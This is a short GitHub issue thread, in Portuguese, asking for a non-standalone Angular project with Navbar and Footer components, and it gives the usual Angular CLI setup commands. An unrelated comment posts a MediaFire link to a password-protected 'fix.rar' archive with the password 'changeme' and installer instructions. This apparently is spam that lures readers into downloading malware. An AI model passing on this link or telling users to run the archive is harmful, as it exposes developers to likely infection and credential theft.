### ISSUE TITLE
Frontend : Criar um projeto não Standalone -> Desenvolver a Navbar e Footer

### ISSUE THREAD

**Issue by santannal** [santannal/Bootcamp-Clients-CRUD#9]
### Crie um projeto _no-standalone_ (como utilizado nas aulas) e desenvolva os componentes **Navbar** e **Footer**.
- npm install -g @angular/cli
- ng new nome-do-projeto
- cd nome-projeto
- ng serve --open

**Comment by 13a10D** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."
